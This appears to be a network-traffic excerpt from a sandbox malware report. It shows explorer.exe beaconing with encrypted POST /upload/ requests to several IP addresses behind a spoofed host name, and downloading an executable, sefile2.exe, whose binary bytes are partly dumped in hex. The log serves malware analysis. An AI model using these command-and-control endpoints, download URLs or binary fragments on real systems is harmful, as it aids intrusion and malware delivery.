0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:20.129852057 CEST	19888	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49738	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:43.457860947 CEST	12070	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: atvcampingtrips.com
Aug 23, 2021 02:08:43.457894087 CEST	12070	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 30 55 cb e9 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vu0UOQB#/lko&"Vz8=;Kt+:~B+LiavUw'}4]-
Aug 23, 2021 02:08:44.681729078 CEST	12071	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:44 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49739	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:45.046821117 CEST	12072	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: atvcampingtrips.com
Aug 23, 2021 02:08:45.048692942 CEST	12072	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 47 1e e6 a0 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vuG\nVy;S*/t1zpxJX62U26[~,/Fho}rXW Bc2)"`9FDw4kc#R/}
Aug 23, 2021 02:08:46.300853968 CEST	12081	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:45 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 56 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 52 39 08 a5 6c 58 b5 ad 1e bd cf b0 f9 6d 92 21 c7 ed 2e 15 11 83 89 9c 81 77 d1 38 1c 1f 9a 50 c4 5c 7e 56 Data Ascii: #\(R9lXm!.w8P\~V

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49740	193.142.59.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:46.348644018 CEST	12082	OUT	GET /forum/docs/sefile2.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 193.142.59.123
Aug 23, 2021 02:08:46.381542921 CEST	12083	IN	HTTP/1.1 200 OK Date: Mon, 23 Aug 2021 00:08:46 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 Last-Modified: Mon, 23 Aug 2021 00:00:02 GMT ETag: "46e00-5ca2eb2ee0897" Accept-Ranges: bytes Content-Length: 290304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 43 a9 49 62 07 c8 27 31 07 c8 27 31 07 c8 27 31 19 9a b2 31 16 c8 27 31 19 9a a4 31 6a c8 27 31 19 9a a3 31 31 c8 27 31 20 0e 5c 31 02 c8 27 31 07 c8 26 31 95 c8 27 31 19 9a ad 31 06 c8 27 31 19 9a b3 31 06 c8 27 31 19 9a b6 31 06 c8 27 31 52 69 63 68 07 c8 27 31 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9c 64 be 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 de 01 00 00 32 fa 01 00 00 00 00 e0 22 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 fb 01 00 04 00 00 32 52 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 6f 02 00 3c 00 00 00 00 d0 fa 01 60 35 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 f2 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 65 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 01 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 dc 01 00 00 10 00 00 00 de 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1a 8b 00 00 00 f0 01 00 00 8c 00 00 00 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 45 f8 01 00 80 02 00 00 ca 01 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 35 00 00 00 d0 fa 01 00 36 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$CIb'1'1'11'11j'111'1 \1'1&1'11'11'11'1Rich'1PELd_2"@2R o<`5`e@.text0 `.rdata@@.data`En@.rsrc`568@@
Aug 23, 2021 02:08:46.381576061 CEST	12084	IN	Data Raw: 00 8b ff 55 8b ec 83 ec 40 83 7d 0c 00 75 1c 83 7d 10 00 76 16 83 7d 08 00 74 09 8b 45 08 c7 00 00 00 00 00 33 c0 e9 d1 02 00 00 83 7d 08 00 74 09 8b 4d 08 c7 01 ff ff ff ff ba ff ff ff 7f 3b 55 10 1b c0 83 c0 01 89 45 ec 75 1e 68 58 f3 41 00 6a Data Ascii: U@}u}v}tE3}tM;UEuhXAjjJhAjp;u}u0:jjJhAhAhXAn8\URMUM]xM~C}t}vURjEP7:*
Aug 23, 2021 02:08:46.381601095 CEST	12086	IN	Data Raw: 8b 55 08 83 7a 04 00 74 4c 8b 45 08 8b 48 04 51 e8 c2 5a 00 00 83 c4 04 83 c0 01 89 45 fc 8b 55 fc 52 e8 10 01 00 00 83 c4 04 8b 4d f8 89 41 04 8b 55 f8 83 7a 04 00 74 1a 8b 45 08 8b 48 04 51 8b 55 fc 52 8b 45 f8 8b 48 04 51 e8 a7 57 00 00 83 c4 Data Ascii: UztLEHQZEURMAUztEHQUREHQWUBEMQPE]UQMEAMytUBPy]UQMExtMAA]UjjEP~Z]
Aug 23, 2021 02:08:46.381627083 CEST	12087	IN	Data Raw: 00 33 d2 81 e2 ff 00 00 00 89 55 c8 8b 45 f8 8b 08 83 c1 01 8b 55 f8 89 0a eb 11 8b 45 f8 50 6a 00 e8 77 69 00 00 83 c4 08 89 45 c8 83 7d c8 ff 74 56 8b 4d f8 8b 51 04 83 ea 01 8b 45 f8 89 50 04 8b 4d f8 83 79 04 00 7c 22 8b 55 f8 8b 02 c6 00 00 Data Ascii: 3UEUEPjwiE}tVMQEPMy\|"U3MUMURj&iE}tE 3MUfDJEx}]UEPMQUREPMQh@E}}EUUE
Aug 23, 2021 02:08:46.381689072 CEST	12088	IN	Data Raw: f8 01 75 01 cc 83 7d d8 00 75 2e e8 b3 2b 00 00 c7 00 16 00 00 00 6a 00 6a 36 68 60 f5 41 00 68 4c f5 41 00 68 a4 f4 41 00 e8 25 29 00 00 83 c4 14 83 c8 ff e9 8c 00 00 00 8d 55 0c 89 55 e4 e8 ef 8a 00 00 83 c0 20 50 6a 01 e8 d4 8c 00 00 83 c4 08 Data Ascii: u}u.+jj6h`AhLAhA%)UU PjE PEEPjMQ PnE PURE PjEMdY_^[]UB39
Aug 23, 2021 02:08:46.381715059 CEST	12090	IN	Data Raw: cc 47 44 00 01 75 05 e8 6d b2 00 00 8b 45 08 50 e8 b4 b2 00 00 83 c4 04 68 ff 00 00 00 e8 87 5b 00 00 83 c4 04 5d c3 cc cc 8b ff 55 8b ec 83 ec 08 c7 45 fc 00 00 40 00 83 7d fc 00 74 0e 8b 45 fc 0f b7 08 81 f9 4d 5a 00 00 74 04 33 c0 eb 49 8b 55 Data Ascii: GDumEPh[]UE@}tEMZt3IUEB<EM9PEt3.UB=t3Mytw3U3]UQEPMQURHHDPMQEE]UEEPMQU
Aug 23, 2021 02:08:46.381737947 CEST	12091	IN	Data Raw: 04 e8 39 9b 00 00 83 c4 04 c3 8b 45 e0 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 08 83 7d 08 00 76 6b b8 e0 ff ff ff 33 d2 f7 75 08 3b 45 0c 1b c0 83 c0 01 89 45 f8 75 21 68 bc f8 41 00 6a 00 68 48 02 00 00 68 10 Data Ascii: 9EMdY_^[]U}vk3u;EEu!hAjhHhAjS!u}u- jhHhAhAhAN3KUUUEPMQUREPHHDQUR=E}tEPjMQrE]U
Aug 23, 2021 02:08:46.381759882 CEST	12093	IN	Data Raw: 6a 01 e8 2e ad 00 00 83 c4 18 83 f8 01 75 01 cc e8 00 1c 00 00 c7 00 16 00 00 00 33 c0 e9 88 02 00 00 83 7d 1c 00 74 25 8b 55 fc 83 c2 24 52 8b 45 f4 50 e8 6d b4 00 00 83 c4 08 89 45 f0 83 7d f0 00 75 07 33 c0 e9 5f 02 00 00 eb 23 8b 4d fc 83 c1 Data Ascii: j.u3}t%U$REPmE}u3_#M$QURxE}u3:3u0B0B}u\|=GDs9UGD+BGD+GD;MvGDUGDGDEGD+HGDGDUGDGD;
Aug 23, 2021 02:08:46.381786108 CEST	12094	IN	Data Raw: f7 41 00 50 68 10 ff 41 00 6a 00 6a 00 6a 00 6a 01 e8 e5 a7 00 00 83 c4 28 83 f8 01 75 01 cc eb 3c 8b 55 fc 83 c2 20 52 8b 45 fc 8b 48 18 51 8b 55 fc 8b 42 14 25 ff ff 00 00 8b 0c 85 3c f7 41 00 51 68 80 fe 41 00 6a 00 6a 00 6a 00 6a 01 e8 a7 a7 Data Ascii: APhAjjjj(u<U REHQUB%<AQhAjjjj uj8BPMQEL QQUztMEHQUBPM QUBPMQ<APhAjjjj+(u<U REHQUB%
Aug 23, 2021 02:08:46.381809950 CEST	12095	IN	Data Raw: e4 87 42 00 31 45 f8 33 c5 50 8d 45 f0 64 a3 00 00 00 00 a1 28 80 42 00 83 e0 01 75 0a b8 01 00 00 00 e9 ed 03 00 00 6a 04 e8 23 8b 00 00 83 c4 04 c7 45 fc 00 00 00 00 e8 c4 ae 00 00 89 45 e0 83 7d e0 ff 0f 84 e4 00 00 00 83 7d e0 fe 0f 84 da 00 Data Ascii: B1E3PEd(Buj#EE}}MMUU}E$=@hxBhAjjjj3uhTBhAjjjjudh0BhAjjjjuBhBhAjjjj
Aug 23, 2021 02:08:46.413199902 CEST	12097	IN	Data Raw: f8 10 25 ff ff 00 00 a3 f0 47 44 00 c7 05 d8 47 44 00 00 00 00 00 8b 4d 08 89 0d 28 80 42 00 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 0b 6a 04 e8 23 86 00 00 83 c4 04 c3 8b 45 e4 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc Data Ascii: %GDGDM(BEj#EMdY_^[]U3}]UQ}u3jj E Pu3h=:uIM Q]E}tU REP2M QjLDRAE Pj

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.3	49741	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:47.728127003 CEST	12382	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 237 Host: atvcampingtrips.com
Aug 23, 2021 02:08:47.728152990 CEST	12383	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 01 6b 2c 90 f4 76 0b 75 25 30 fa ac Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA ,[k,vu%0iPmjua2im212v(bFeDfmD@G:Rqj( A]]3t+#00FcEyN^qY
Aug 23, 2021 02:08:48.899586916 CEST	12388	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:48 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.3	49742	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:49.202387094 CEST	12389	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 334 Host: atvcampingtrips.com
Aug 23, 2021 02:08:49.202418089 CEST	12390	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 42 1f c7 f8 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vuBrZ@F4bX[,yBJ;}nxM/:40O}L~6'QMzWW!G,b.Y5'3q'H^`ORdb,N2
Aug 23, 2021 02:08:50.394051075 CEST	12394	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:08:49 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49710	218.233.73.202	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:07:57.666501045 CEST	1567	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 133 Host: atvcampingtrips.com
Aug 23, 2021 02:07:57.668013096 CEST	1567	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 3c 37 b3 9f Data Ascii: 9nQ&q}~cs~x2n) ve+?*$`7C[zqNA -[k,vu<7aj~3aGcj(j3g/DY

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.3	49743	220.125.1.129	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:50.716162920 CEST	12395	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 292 Host: atvcampingtrips.com
